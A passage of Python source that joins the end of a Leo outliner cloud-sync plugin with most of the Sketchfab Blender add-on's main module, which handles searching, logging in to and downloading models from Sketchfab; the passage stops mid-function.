elif write_on_save == 'no':
no.append(kwargs['ID'])
elif write_on_save == 'unchanged':
unchanged.append(kwargs['ID'])
elif write_on_save != 'ask':
skipped.append(kwargs['ID'])
if skipped:
g.app.gui.runAskOkDialog(self.c, "Unsaved cloud data",
message="There is unsaved cloud data, use\nwrite_on_save: yes|no|ask\n"
"in @leo_cloud nodes to avoid this message.\nUnsaved data:\n%s" % ', '.join(skipped))
if unchanged:
g.es("Unchanged cloud data: %s" % ', '.join(unchanged))
if no:
g.es("Cloud data never saved: %s" % ', '.join(no))
def subtree_changed(self, p):
"""subtree_changed - check if subtree is changed
:param position p: top of subtree
:return: bool
"""
if isinstance(p, vnode):
p = self.c.vnode2position(p)
for nd in p.self_and_subtree_iter():
if nd.isDirty():
break
else:
return False
return True
@staticmethod
def _to_json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, (datetime, date)):
return obj.isoformat()
if isinstance(obj, set):
return list(obj)
raise TypeError ("Type %s not serializable" % type(obj))
@staticmethod
def to_json(data):
"""to_json - convert dict to appropriate JSON
:param dict data: data to convert
:return: json
:rtype: str
"""
return json.dumps(
data,
sort_keys=True, # prevent unnecessary diffs
indent=0, # make json readable on cloud web pages
default=LeoCloud._to_json_serial
)
@staticmethod
def _to_dict_recursive(v, d):
"""_to_dict_recursive - recursively make dictionary representation of v
:param vnode v: subtree to convert
:param dict d: dict for results
:return: dict of subtree
"""
d['b'] = v.b
d['h'] = v.h
d['u'] = v.u
d['children'] = []
for child in v.children:
d['children'].append(LeoCloud._to_dict_recursive(child, dict()))
return d
@staticmethod
def to_dict(v):
"""to_dict - make dictionary representation of v
:param vnode v: subtree to convert
:return: dict of subtree
"""
return LeoCloud._to_dict_recursive(v, dict())
@staticmethod
def _ua_clean(d):
"""_ua_clean - strip todo icons from dict
:param dict d: dict to clean
:return: cleaned dict
recursive_hash() to compare trees stumbles on todo icons which are
derived information from the todo attribute and include *local*
paths to icon images
"""
d = deepcopy(d)
if 'icons' in d:
d['icons'] = [i for i in d['icons'] if not i.get('cleoIcon')]
return d
def write_current(self, p=None):
"""write_current - write current tree to cloud
"""
if p is None:
p = self.find_at_leo_cloud(self.c.p)
if not p:
return
g.es("Storing to cloud...") # some io's as slow to init. - reassure user
lc_io = getattr(p.v, '_leo_cloud_io', None) or self.io_from_node(p)
lc_io.put_subtree(lc_io.lc_id, p.v)
g.es("Stored %s" % lc_io.lc_id)
# writing counts as reading, last read time msg. confusing otherwise
p.v.u.setdefault('_leo_cloud', {})['last_read'] = datetime.now().isoformat()
|
__init__.py
|
"""
Copyright 2022 Sketchfab
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import urllib
import requests
import threading
import time
from collections import OrderedDict
import subprocess
import tempfile
import json
import shutil
from uuid import UUID
import bpy
import bpy.utils.previews
from bpy.props import (StringProperty,
EnumProperty,
BoolProperty,
IntProperty,
PointerProperty)
from .io import *
from .io.imp.gltf2_io_gltf import *
from .blender.imp.gltf2_blender_gltf import *
from .blender.blender_version import Version
# Blender 2.79 has been shipped with openssl version 0.9.8 which uses a TLS protocol
# that is now blocked for security reasons on websites (github.com for example)
# In order to allow communication with github.com and other websites, the code will intend
# to use the updated openssl version distributed with the addon.
# Note: Blender 2.8 will have a more recent openssl version. This fix is only for 2.79 and olders
if bpy.app.version < (2, 80, 0) and not bpy.app.build_platform == b'Windows':
try:
sslib_path = None
if bpy.app.build_platform == b'Darwin':
sslib_path = os.path.join(os.path.dirname(__file__), 'dependencies/_ssl.cpython-35m-darwin.so')
elif bpy.app.build_platform == b'Linux':
sslib_path = os.path.join(os.path.dirname(__file__), '/io_sketchfab_plugin/_ssl.cpython-35m-x86_64-linux-gnu.so')
import importlib.util
spec = importlib.util.spec_from_file_location("_ssl", sslib_path)
new_ssl = importlib.util.module_from_spec(spec)
spec.loader.exec_module(new_ssl)
from importlib import reload
import ssl
reload(ssl)
from requests.packages.urllib3.util import ssl_
reload(ssl_)
print('SSL python module has been successfully overriden by Sketchfab addon')
print('It might fix other addons having the same refused TLS protocol issue')
except Exception as e:
print(e)
print("Failed to override SSL lib. The plugin will not be able to check for updates")
bl_info = {
'name': 'Sketchfab Plugin',
'description': 'Browse and download free Sketchfab downloadable models',
'author': 'Sketchfab',
'license': 'APACHE2',
'deps': '',
'version': (1, 5, 0),
"blender": (2, 80, 0),
'location': 'View3D > Tools > Sketchfab',
'warning': '',
'wiki_url': 'https://github.com/sketchfab/blender-plugin/releases',
'tracker_url': 'https://github.com/sketchfab/blender-plugin/issues',
'link': 'https://github.com/sketchfab/blender-plugin',
'support': 'COMMUNITY',
'category': 'Import-Export'
}
bl_info['blender'] = getattr(bpy.app, "version")
PLUGIN_VERSION = str(bl_info['version']).strip('() ').replace(',', '.')
preview_collection = {}
thumbnailsProgress = set([])
ongoingSearches = set([])
is_plugin_enabled = False
class Config:
ADDON_NAME = 'io_sketchfab'
GITHUB_REPOSITORY_URL = 'https://github.com/sketchfab/blender-plugin'
GITHUB_REPOSITORY_API_URL = 'https://api.github.com/repos/sketchfab/blender-plugin'
SKETCHFAB_REPORT_URL = 'https://help.sketchfab.com/hc/en-us/requests/new?type=exporters&subject=Blender+Plugin'
SKETCHFAB_URL = 'https://sketchfab.com'
DUMMY_CLIENTID = 'hGC7unF4BHyEB0s7Orz5E1mBd3LluEG0ILBiZvF9'
SKETCHFAB_OAUTH = SKETCHFAB_URL + '/oauth2/token/?grant_type=password&client_id=' + DUMMY_CLIENTID
SKETCHFAB_API = 'https://api.sketchfab.com'
SKETCHFAB_SEARCH = SKETCHFAB_API + '/v3/search'
SKETCHFAB_MODEL = SKETCHFAB_API + '/v3/models'
SKETCHFAB_ORGS = SKETCHFAB_API + '/v3/orgs'
SKETCHFAB_SIGNUP = 'https://sketchfab.com/signup'
BASE_SEARCH = SKETCHFAB_SEARCH + '?type=models&downloadable=true'
DEFAULT_FLAGS = '&staffpicked=true&sort_by=-staffpickedAt'
DEFAULT_SEARCH = SKETCHFAB_SEARCH + \
'?type=models&downloadable=true' + DEFAULT_FLAGS
SKETCHFAB_ME = '{}/v3/me'.format(SKETCHFAB_API)
BASE_SEARCH_OWN_MODELS = SKETCHFAB_ME + '/search?type=models&downloadable=true'
PURCHASED_MODELS = SKETCHFAB_ME + "/models/purchases?type=models"
SKETCHFAB_PLUGIN_VERSION = '{}/releases'.format(GITHUB_REPOSITORY_API_URL)
# Those will be set during plugin initialization, or upon setting a new cache directory
SKETCHFAB_TEMP_DIR = ""
SKETCHFAB_THUMB_DIR = ""
SKETCHFAB_MODEL_DIR = ""
SKETCHFAB_CATEGORIES = (('ALL', 'All categories', 'All categories'),
('animals-pets', 'Animals & Pets', 'Animals and Pets'),
('architecture', 'Architecture', 'Architecture'),
('art-abstract', 'Art & Abstract', 'Art & Abstract'),
('cars-vehicles', 'Cars & vehicles', 'Cars & vehicles'),
('characters-creatures', 'Characters & Creatures', 'Characters & Creatures'),
('cultural-heritage-history', 'Cultural Heritage & History', 'Cultural Heritage & History'),
('electronics-gadgets', 'Electronics & Gadgets', 'Electronics & Gadgets'),
('fashion-style', 'Fashion & Style', 'Fashion & Style'),
('food-drink', 'Food & Drink', 'Food & Drink'),
('furniture-home', 'Furniture & Home', 'Furniture & Home'),
('music', 'Music', 'Music'),
('nature-plants', 'Nature & Plants', 'Nature & Plants'),
('news-politics', 'News & Politics', 'News & Politics'),
('people', 'People', 'People'),
('places-travel', 'Places & Travel', 'Places & Travel'),
('science-technology', 'Science & Technology', 'Science & Technology'),
('sports-fitness', 'Sports & Fitness', 'Sports & Fitness'),
('weapons-military', 'Weapons & Military', 'Weapons & Military'))
SKETCHFAB_FACECOUNT = (('ANY', "All", ""),
('10K', "Up to 10k", ""),
('50K', "10k to 50k", ""),
('100K', "50k to 100k", ""),
('250K', "100k to 250k", ""),
('250KP', "250k +", ""))
SKETCHFAB_SORT_BY = (('RELEVANCE', "Relevance", ""),
('LIKES', "Likes", ""),
('VIEWS', "Views", ""),
('RECENT', "Recent", ""))
SKETCHFAB_SEARCH_DOMAIN = (('DEFAULT', "All site", "", 0),
('OWN', "Own Models (PRO)", "", 1),
('STORE', "Store purchases", "", 2))
MAX_THUMBNAIL_HEIGHT = 256
SKETCHFAB_UPLOAD_LIMITS = {
"basic" : 100 * 1024 * 1024,
"plus": 100 * 1024 * 1024,
"pro": 200 * 1024 * 1024,
"prem": 200 * 1024 * 1024,
"biz": 500 * 1024 * 1024,
"ent": 500 * 1024 * 1024
}
class Utils:
def humanify_size(size):
suffix = 'B'
readable = size
# Megabyte
if size > 1048576:
suffix = 'MB'
readable = size / 1048576.0
# Kilobyte
elif size > 1024:
suffix = 'KB'
readable = size / 1024.0
readable = round(readable, 2)
return '{}{}'.format(readable, suffix)
def humanify_number(number):
suffix = ''
readable = number
if number > 1000000:
suffix = 'M'
readable = number / 1000000.0
elif number > 1000:
suffix = 'K'
readable = number / 1000.0
readable = round(readable, 2)
return '{}{}'.format(readable, suffix)
def build_download_url(uid, use_org_profile=False, active_org=None):
if use_org_profile:
return '{}/{}/models/{}/download'.format(Config.SKETCHFAB_ORGS, active_org["uid"], uid)
else:
return '{}/{}/download'.format(Config.SKETCHFAB_MODEL, uid)
def thumbnail_file_exists(uid):
return os.path.exists(os.path.join(Config.SKETCHFAB_THUMB_DIR, '{}.jpeg'.format(uid)))
def clean_thumbnail_directory():
if not os.path.exists(Config.SKETCHFAB_THUMB_DIR):
return
from os import listdir
for file in listdir(Config.SKETCHFAB_THUMB_DIR):
os.remove(os.path.join(Config.SKETCHFAB_THUMB_DIR, file))
def clean_downloaded_model_dir(uid):
shutil.rmtree(os.path.join(Config.SKETCHFAB_MODEL_DIR, uid))
def get_thumbnail_url(thumbnails_json):
min_height = 1e6
min_thumbnail = None
best_height = 0
best_thumbnail = None
for image in thumbnails_json['images']:
h = image['height']
if h <= Config.MAX_THUMBNAIL_HEIGHT and h > best_height:
best_height = h
best_thumbnail = image['url']
elif h < min_height:
min_height = h
min_thumbnail = image['url']
# Ensure we have a thumbnail if available thumbnails are all above MAX_THUMBNAIL_HEIGHT
if best_thumbnail is None and min_thumbnail is not None:
return min_thumbnail
return best_thumbnail
def make_model_name(gltf_data):
if 'title' in gltf_data.asset.extras:
return gltf_data.asset.extras['title']
return 'GLTFModel'
def setup_plugin():
if not os.path.exists(Config.SKETCHFAB_THUMB_DIR):
os.makedirs(Config.SKETCHFAB_THUMB_DIR)
def get_uid_from_thumbnail_url(thumbnail_url):
return thumbnail_url.split('/')[4]
def get_uid_from_model_url(model_url, use_org_profile=False):
try:
return model_url.split('/')[7] if use_org_profile else model_url.split('/')[5]
except:
ShowMessage("ERROR", "Url parsing error", "Error getting uid from url: {}".format(model_url))
return None
def get_uid_from_download_url(model_url):
return model_url.split('/')[6]
def clean_node_hierarchy(objects, root_name):
"""
Removes the useless nodes in a hierarchy
TODO: Keep the transform (might impact Yup/Zup)
"""
# Find the parent object
root = None
for object in objects:
if object.parent is None:
root = object
if root is None:
return None
# Go down its hierarchy until one child has multiple children, or a single mesh
# Keep the name while deleting objects in the hierarchy
diverges = False
while diverges==False:
children = root.children
if children is not None:
if len(children)>1:
diverges = True
root.name = root_name
if len(children)==1:
if children[0].type != "EMPTY":
diverges = True
root.name = root_name
if children[0].type == "MESH": # should always be the case
matrixcopy = children[0].matrix_world.copy()
children[0].parent = None
children[0].matrix_world = matrixcopy
bpy.data.objects.remove(root)
children[0].name = root_name
root = children[0]
elif children[0].type == "EMPTY":
diverges = False
matrixcopy = children[0].matrix_world.copy()
children[0].parent = None
children[0].matrix_world = matrixcopy
bpy.data.objects.remove(root)
root = children[0]
else:
break
# Select the root Empty node
root.select_set(True)
def is_valid_uuid(uuid_to_test, version=4):
try:
uuid_obj = UUID(hex=uuid_to_test, version=version)
return True
except ValueError:
return False
class Cache:
SKETCHFAB_CACHE_FILE = os.path.join(
bpy.utils.user_resource("SCRIPTS", path="sketchfab_cache", create=True),
".cache"
) # Use a user path to avoid permission-related errors
def read():
if not os.path.exists(Cache.SKETCHFAB_CACHE_FILE):
return {}
with open(Cache.SKETCHFAB_CACHE_FILE, 'rb') as f:
data = f.read().decode('utf-8')
return json.loads(data)
def get_key(key):
cache_data = Cache.read()
if key in cache_data:
return cache_data[key]
def save_key(key, value):
cache_data = Cache.read()
cache_data[key] = value
with open(Cache.SKETCHFAB_CACHE_FILE, 'wb+') as f:
f.write(json.dumps(cache_data).encode('utf-8'))
def delete_key(key):
cache_data = Cache.read()
if key in cache_data:
del cache_data[key]
with open(Cache.SKETCHFAB_CACHE_FILE, 'wb+') as f:
f.write(json.dumps(cache_data).encode('utf-8'))
# helpers
def get_sketchfab_login_props():
return bpy.context.window_manager.sketchfab_api
def get_sketchfab_props():
return bpy.context.window_manager.sketchfab_browser
def get_sketchfab_props_proxy():
return bpy.context.window_manager.sketchfab_browser_proxy
def get_sketchfab_model(uid):
skfb = get_sketchfab_props()
if "current" in skfb.search_results and uid in skfb.search_results["current"]:
return skfb.search_results['current'][uid]
else:
return None
def run_default_search():
searchthr = GetRequestThread(Config.DEFAULT_SEARCH, parse_results)
searchthr.start()
def get_plugin_enabled():
global is_plugin_enabled
return is_plugin_enabled
def refresh_search(self, context):
pprops = get_sketchfab_props_proxy()
if pprops.is_refreshing:
return
props = get_sketchfab_props()
if pprops.search_domain != props.search_domain:
props.search_domain = pprops.search_domain
if pprops.sort_by != props.sort_by:
props.sort_by = pprops.sort_by
if 'current' in props.search_results:
del props.search_results['current']
props.query = pprops.query
props.animated = pprops.animated
props.pbr = pprops.pbr
props.staffpick = pprops.staffpick
props.categories = pprops.categories
props.face_count = pprops.face_count
bpy.ops.wm.sketchfab_search('EXEC_DEFAULT')
def set_login_status(status_type, status):
login_props = get_sketchfab_login_props()
login_props.status = status
login_props.status_type = status_type
def set_import_status(status):
props = get_sketchfab_props()
props.import_status = status
class SketchfabApi:
def __init__(self):
self.access_token = ''
self.api_token = ''
self.headers = {}
self.username = ''
self.display_name = ''
self.plan_type = ''
self.next_results_url = None
self.prev_results_url = None
self.user_orgs = []
self.active_org = None
self.use_org_profile = False
def build_headers(self):
if self.access_token:
self.headers = {'Authorization': 'Bearer ' + self.access_token}
elif self.api_token:
self.headers = {'Authorization': 'Token ' + self.api_token}
else:
print("Empty authorization header")
self.headers = {}
def login(self, email, password, api_token):
bpy.ops.wm.login_modal('INVOKE_DEFAULT')
def is_user_logged(self):
if (self.access_token or self.api_token) and self.headers:
return True
return False
def is_user_pro(self):
return len(self.plan_type) and self.plan_type not in ['basic', 'plus']
def logout(self):
self.access_token = ''
self.api_token = ''
self.headers = {}
Cache.delete_key('username')
Cache.delete_key('access_token')
Cache.delete_key('api_token')
Cache.delete_key('key')
props = get_sketchfab_props()
#props.search_domain = "DEFAULT"
if 'current' in props.search_results:
del props.search_results['current']
pprops = get_sketchfab_props_proxy()
#pprops.search_domain = "DEFAULT"
self.user_orgs = []
self.active_org = None
self.use_org_profile = False
props.use_org_profile = False
pprops.use_org_profile = False
bpy.ops.wm.sketchfab_search('EXEC_DEFAULT')
def request_user_info(self):
requests.get(Config.SKETCHFAB_ME, headers=self.headers, hooks={'response': self.parse_user_info})
def get_user_info(self):
if self.display_name and self.plan_type:
return '{} ({})'.format(self.display_name, self.plan_type)
else:
return ('', '')
def parse_user_info(self, r, *args, **kargs):
if r.status_code == 200:
user_data = r.json()
self.username = user_data['username']
self.display_name = user_data['displayName']
self.plan_type = user_data['account']
requests.get(Config.SKETCHFAB_ME + "/orgs", headers=self.headers, hooks={'response': self.parse_orgs_info})
else:
print('\nInvalid access or API token\nYou can get your API token here:\nhttps://sketchfab.com/settings/password\n')
set_login_status('ERROR', 'Failed to authenticate')
ShowMessage("ERROR", "Failed to authenticate", "Invalid access or API token")
self.access_token = ''
self.api_token = ''
self.headers = {}
def parse_orgs_info(self, r, *args, **kargs):
"""
Get and store information about user's orgs, and its orgs projects
"""
if r.status_code == 200:
orgs_data = r.json()
# Get a list of the user's orgs
for org in orgs_data["results"]:
self.user_orgs.append({
"uid": org["uid"],
"displayName": org["displayName"],
"username": org["username"],
"url": org["publicProfileUrl"],
"projects": [],
})
self.user_orgs.sort(key = lambda x : x["displayName"])
# Iterate on the orgs to get lists of their projects
for org in self.user_orgs:
# Create the callback inline to keep a reference to the org uid
def parse_projects_info(r, *args, **kargs):
"""
Get and store information about an org projects
"""
if r.status_code == 200:
projects_data = r.json()
projects = projects_data["results"]
# Add the projects to the orgs dict object
for proj in projects:
org_uid = proj["org"]["uid"]
org = next((x for x in self.user_orgs if x["uid"] == org_uid))
org["projects"].append({
"uid": proj["uid"],
"name": proj["name"],
"slug": proj["slug"],
"modelCount": proj["modelCount"],
"memberCount": proj["memberCount"],
})
org["projects"].sort(key = lambda x : x["name"])
# Iterate on all projects (not just the 24 first)
if projects_data["next"] is not None:
requests.get(
projects_data["next"],
headers=self.headers,
hooks={'response': parse_projects_info}
)
else:
print('Can not get projects info')
requests.get("%s/%s/projects" % (Config.SKETCHFAB_ORGS, org["uid"]),
headers=self.headers,
hooks={'response': parse_projects_info})
# Set the first org as active
if len(self.user_orgs):
self.active_org = self.user_orgs[0]
# Iterate on all orgs (not just the 24 first)
if orgs_data["next"] is not None:
requests.get(orgs_data["next"], headers=self.headers, hooks={'response': self.parse_orgs_info})
def request_thumbnail(self, thumbnails_json, model_uid):
# Avoid requesting twice the same data
if model_uid not in thumbnailsProgress:
thumbnailsProgress.add(model_uid)
url = Utils.get_thumbnail_url(thumbnails_json)
thread = ThumbnailCollector(url)
thread.start()
def request_model_info(self, uid, callback=None):
callback = self.handle_model_info if callback is None else callback
url = Config.SKETCHFAB_MODEL + '/' + uid
if self.use_org_profile and self.active_org.get("uid"):
url = Config.SKETCHFAB_ORGS + "/" + self.active_org["uid"] + "/models/" + uid
model_infothr = GetRequestThread(url, callback, self.headers)
model_infothr.start()
def handle_model_info(self, r, *args, **kwargs):
skfb = get_sketchfab_props()
uid = Utils.get_uid_from_model_url(r.url, self.use_org_profile)
# Dirty fix to avoid processing obsolete result data
if 'current' not in skfb.search_results or uid is None or uid not in skfb.search_results['current']:
return
model = skfb.search_results['current'][uid]
json_data = r.json()
model.license = json_data.get('license', {})
if model.license is not None:
model.license = model.license.get('fullName', 'Personal (you own this model)')
anim_count = int(json_data.get('animationCount', 0))
model.animated = 'Yes ({} animation(s))'.format(anim_count) if anim_count > 0 else 'No'
skfb.search_results['current'][uid] = model
def search(self, query, search_cb):
skfb = get_sketchfab_props()
url = Config.BASE_SEARCH
if skfb.search_domain == "OWN":
url = Config.BASE_SEARCH_OWN_MODELS
elif skfb.search_domain == "STORE":
url = Config.PURCHASED_MODELS
elif skfb.search_domain == "ACTIVE_ORG":
url = Config.SKETCHFAB_ORGS + "/%s/models?isArchivesReady=true" % self.active_org["uid"]
elif len(skfb.search_domain) == 32:
url = Config.SKETCHFAB_ORGS + "/%s/models?isArchivesReady=true&projects=%s" % (self.active_org["uid"], skfb.search_domain)
search_query = '{}{}'.format(url, query)
if search_query not in ongoingSearches:
ongoingSearches.add(search_query)
searchthr = GetRequestThread(search_query, search_cb, self.headers)
searchthr.start()
def search_cursor(self, url, search_cb):
requests.get(url, headers=self.headers, hooks={'response': search_cb})
def write_model_info(self, title, author, authorUrl, license, uid):
try:
downloadHistory = bpy.context.preferences.addons[__name__.split('.')[0]].preferences.downloadHistory
if downloadHistory != "":
downloadHistory = os.path.abspath(downloadHistory)
createFile = False
if not os.path.exists(downloadHistory):
createFile = True
with open(downloadHistory, 'a+') as f:
if createFile:
f.write("Model name, Author name, Author url, License, Model link,\n")
f.write("{}, {}, https://sketchfab.com/{}, {}, https://sketchfab.com/models/{},\n".format(
title.replace(",", " "),
author.replace(",", " "),
authorUrl.replace(",", " "),
license.replace(",", " "),
uid
))
except:
print("Error encountered while saving data to history file")
def parse_model_info_request(self, r, *args, **kargs):
try:
if r.status_code == 200:
result = r.json()
title = result['name']
author = result['user']['displayName']
username = result['user']['username']
license = result["license"]["label"]
uid = result['uid']
self.write_model_info(title, author, username, license, uid)
else:
print("Error encountered while getting model info ({})\n{}\n{}".format(r.status_code, r.url, str(r.json())))
except:
print("Error encountered while parsing model info request: {}".format(r.url))
def download_model(self, uid):
skfb_model = get_sketchfab_model(uid)
if skfb_model is not None: # The model comes from the search results
if skfb_model.download_url and (time.time() - skfb_model.time_url_requested < skfb_model.url_expires):
self.get_archive(skfb_model.download_url)
else:
skfb_model.download_url = None
skfb_model.url_expires = None
skfb_model.time_url_requested = None
self.write_model_info(skfb_model.title, skfb_model.author, skfb_model.username, skfb_model.license, uid)
requests.get(Utils.build_download_url(uid, self.use_org_profile, self.active_org), headers=self.headers, hooks={'response': self.handle_download})
else: # Model comes from a direct link
skfb = get_sketchfab_props()
download_url = ""
# If the model is in an org, find if the user has access to it
if "/orgs/" in skfb.manualImportPath:
try:
orgName = skfb.manualImportPath.split("/orgs/")[1].split("/")[0]
user_orgs = skfb.skfb_api.user_orgs
orgUid = ""
for org in user_orgs:
if org["username"] == orgName:
orgUid = org["uid"]
break
if orgUid:
download_url = '{}/{}/models/{}/download'.format(Config.SKETCHFAB_ORGS, orgUid, uid)
else:
ShowMessage("ERROR", "User not in Organization", "User does not appear to belong to org %s" % (orgName))
return
except:
ShowMessage("ERROR", "Invalid url", "Cannot parse org name from url %s" % skfb.manualImportPath)
return
# Otherwise, request a direct download and get model info
else:
download_url = Utils.build_download_url(uid)
requests.get('{}/{}'.format(Config.SKETCHFAB_MODEL, uid), headers=skfb.skfb_api.headers, hooks={'response': self.parse_model_info_request})
requests.get(download_url, headers=self.headers, hooks={'response': self.handle_download})
def handle_download(self, r, *args, **kwargs):
if r.status_code != 200 or 'gltf' not in r.json():
ShowMessage("ERROR", "This model is not downloadable", "Make sure your account has enough rights to download the model")
return
skfb = get_sketchfab_props()
uid = Utils.get_uid_from_model_url(r.url, self.use_org_profile)
if uid is None:
return
gltf = r.json()['gltf']
skfb_model = get_sketchfab_model(uid)
if skfb_model is not None:
skfb_model.download_url = gltf['url']
skfb_model.time_url_requested = time.time()
skfb_model.url_expires = gltf['expires']
self.get_archive(gltf['url'])
def get_archive(self, url):
if url is None:
print('Url is None')
return
r = requests.get(url, stream=True)
uid = Utils.get_uid_from_download_url(url)
temp_dir = os.path.join(Config.SKETCHFAB_MODEL_DIR, uid)
if not os.path.exists(temp_dir):
os.makedirs(temp_dir)
archive_path = os.path.join(temp_dir, '{}.zip'.format(uid))
if not os.path.exists(archive_path):
wm = bpy.context.window_manager
wm.progress_begin(0, 100)
set_log("Downloading model..")
with open(archive_path, "wb") as f:
total_length = r.headers.get('content-length')
if total_length is None: # no content length header
f.write(r.content)
else:
dl = 0
total_length = int(total_length)
for data in r.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
done = int(100 * dl / total_length)
wm.progress_update(done)
set_log("Downloading model..{}%".format(done))
wm.progress_end()
else:
print('Model already downloaded')
gltf_path, gltf_zip = unzip_archive(archive_path)
if gltf_path:
try:
import_model(gltf_path, uid)
except Exception as e:
import traceback
print(traceback.format_exc())
else:
ShowMessage("ERROR", "Download error", "Failed to download model (url might be invalid)")
model = get_sketchfab_model(uid)
set_import_status("Import model ({})".format(model.download_size if model.download_size else 'fetching data'))
return
class SketchfabLoginProps(bpy.types.PropertyGroup):
def update_tr(self, context):
self.status = ''
if self.email != self.last_username or self.password != self.last_password:
self.last_username = self.email
self.last_password = self.password
if not self.password:
set_login_status('ERROR', 'Password is empty')
bpy.ops.wm.sketchfab_login('EXEC_DEFAULT')
email : StringProperty(
name="email",
description="User email",
default=""
)
api_token : StringProperty(
name="API Token",
description="User API Token",
default=""
)
use_mail : BoolProperty(
name="Use mail / password",
description="Use mail/password login or API Token",
default=True,
)
password : StringProperty(
name="password",
description="User password",
subtype='PASSWORD',
default="",
update=update_tr
)
access_token : StringProperty(
name="access_token",
description="oauth access token",
subtype='PASSWORD',
default=""
)
status : StringProperty(name='', default='')
status_type : EnumProperty(
name="Login status type",
items=(('ERROR', "Error", ""),
('INFO', "Information", ""),
('FILE_REFRESH', "Progress", "")),
description="Determines which icon to use",
default='FILE_REFRESH'
)
last_username : StringProperty(default="default")
last_password : StringProperty(default="default")
skfb_api = SketchfabApi()
def get_user_orgs(self, context):
api = get_sketchfab_props().skfb_api
return [(org["uid"], org["displayName"], "") for org in api.user_orgs]
def get_org_projects(self, context):
api = get_sketchfab_props().skfb_api
return [(proj["uid"], proj["name"], proj["name"]) for proj in api.active_org["projects"]]
def get_available_search_domains(self, context):
api = get_sketchfab_props().skfb_api
search_domains = [domain for domain in Config.SKETCHFAB_SEARCH_DOMAIN]
if len(api.user_orgs) and api.use_org_profile:
search_domains = [
("ACTIVE_ORG", "Active Organization", api.active_org["displayName"], 0)
]
for p in get_org_projects(self, context):
search_domains.append(p)
return tuple(search_domains)
def refresh_orgs(self, context):
pprops = get_sketchfab_props_proxy()
if pprops.is_refreshing:
return
props = get_sketchfab_props()
api = props.skfb_api
api.use_org_profile = pprops.use_org_profile
orgs = [org for org in api.user_orgs if org["uid"] == pprops.active_org]
api.active_org = orgs[0] if len(orgs) else None
if pprops.use_org_profile != props.use_org_profile:
props.use_org_profile = pprops.use_org_profile
if pprops.active_org != props.active_org:
props.active_org = pprops.active_org
if props.use_org_profile:
props.search_domain = "ACTIVE_ORG"
pprops.search_domain = "ACTIVE_ORG"
else:
props.search_domain = "DEFAULT"
pprops.search_domain = "DEFAULT"
refresh_search(self, context)
def get_sorting_options(self, context):
api = get_sketchfab_props().skfb_api
if len(api.user_orgs) and api.use_org_profile:
return (
('RELEVANCE', "Relevance", ""),
('RECENT', "Recent", "")
)
else:
return Config.SKETCHFAB_SORT_BY
class SketchfabBrowserPropsProxy(bpy.types.PropertyGroup):
# Search
query : StringProperty(
name="",
update=refresh_search,
description="Query to search",
default="",
options={'SKIP_SAVE'}
)
pbr : BoolProperty(
name="PBR",
description="Search for PBR model only",
default=False,
update=refresh_search,
)
categories : EnumProperty(
name="Categories",
items=Config.SKETCHFAB_CATEGORIES,
description="Show only models of category",
default='ALL',
update=refresh_search
)
face_count : EnumProperty(
name="Face Count",
items=Config.SKETCHFAB_FACECOUNT,
description="Determines which meshes are exported",
default='ANY',
update=refresh_search
)
sort_by : EnumProperty(
name="Sort by",
items=get_sorting_options,
description="Sort ",
update=refresh_search,
)
animated : BoolProperty(
name="Animated",
description="Show only models with animation",
default=False,
update=refresh_search
)
staffpick : BoolProperty(
name="Staffpick",
description="Show only staffpick models",
default=False,
update=refresh_search
)
search_domain : EnumProperty(
name="",
items=get_available_search_domains,
description="Search domain ",
update=refresh_search,
default=None
)
use_org_profile : BoolProperty(
name="Use organisation profile",
description="Download/Upload as a member of an organization.\nSearch queries and uploads will be performed to\nthe organisation and project selected below",
default=False,
update=refresh_orgs
)
active_org : EnumProperty(
name="Org",
items=get_user_orgs,
description="Active org",
update=refresh_orgs
)
is_refreshing : BoolProperty(
name="Refresh",
description="Refresh",
default=False,
)
expanded_filters : bpy.props.BoolProperty(default=False)
class SketchfabBrowserProps(bpy.types.PropertyGroup):
# Search
query : StringProperty(
name="Search",
description="Query to search",
default=""
)
pbr : BoolProperty(
name="PBR",
description="Search for PBR model only",
default=False
)
categories : EnumProperty(
name="Categories",
items=Config.SKETCHFAB_CATEGORIES,
description="Show only models of category",
default='ALL',
)
face_count : EnumProperty(
name="Face Count",
items=Config.SKETCHFAB_FACECOUNT,
description="Determines which meshes are exported",
default='ANY',
)
sort_by : EnumProperty(
name="Sort by",
items=get_sorting_options,
description="Sort ",
)
animated : BoolProperty(
name="Animated",
description="Show only models with animation",
default=False,
)
staffpick : BoolProperty(
name="Staffpick",
description="Show only staffpick models",
default=False,
)
search_domain : EnumProperty(
name="Search domain",
items=get_available_search_domains,
description="Search domain ",
)
use_org_profile : BoolProperty(
name="Use organisation profile",
description="Import/Export as a member of an organization\nLOL",
default=False,
)
active_org : EnumProperty(
name="Org",
items=get_user_orgs,
description="Active org",
)
status : StringProperty(name='status', default='idle')
use_preview : BoolProperty(
name="Use Preview",
description="Show results using preview widget instead of regular buttons with thumbnails as icons",
default=True
)
search_results = {}
current_key : StringProperty(name='current', default='current')
has_searched_next : BoolProperty(name='next', default=False)
has_searched_prev : BoolProperty(name='prev', default=False)
skfb_api = SketchfabLoginProps.skfb_api
custom_icons = bpy.utils.previews.new()
has_loaded_thumbnails : BoolProperty(default=False)
is_latest_version : IntProperty(default=-1)
import_status : StringProperty(name='import', default='')
manualImportBoolean : BoolProperty(
name="Import from url",
description="Import a downloadable model from a url",
default=False,
)
manualImportPath : StringProperty(
name="Url",
description="Paste full model url:\n* https://sketchfab.com/models/mymodel-XXXX\n* https://sketchfab.com/orgs/XXXX/3d-models/mymodel-YYYY",
default="",
maxlen=1024,
options={'TEXTEDIT_UPDATE'})
def list_current_results(self, context):
skfb = get_sketchfab_props()
# No results:
if 'current' not in skfb.search_results:
return preview_collection['default']
if skfb.has_loaded_thumbnails and 'thumbnails' in preview_collection:
return preview_collection['thumbnails']
res = []
missing_thumbnail = False
if 'current' in skfb.search_results and len(skfb.search_results['current']):
skfb_results = skfb.search_results['current']
for i, result in enumerate(skfb_results):
if result in skfb_results:
model = skfb_results[result]
if model.uid in skfb.custom_icons:
res.append((model.uid, model.title, "", skfb.custom_icons[model.uid].icon_id, i))
else:
res.append((model.uid, model.title, "", preview_collection['skfb']['0'].icon_id, i))
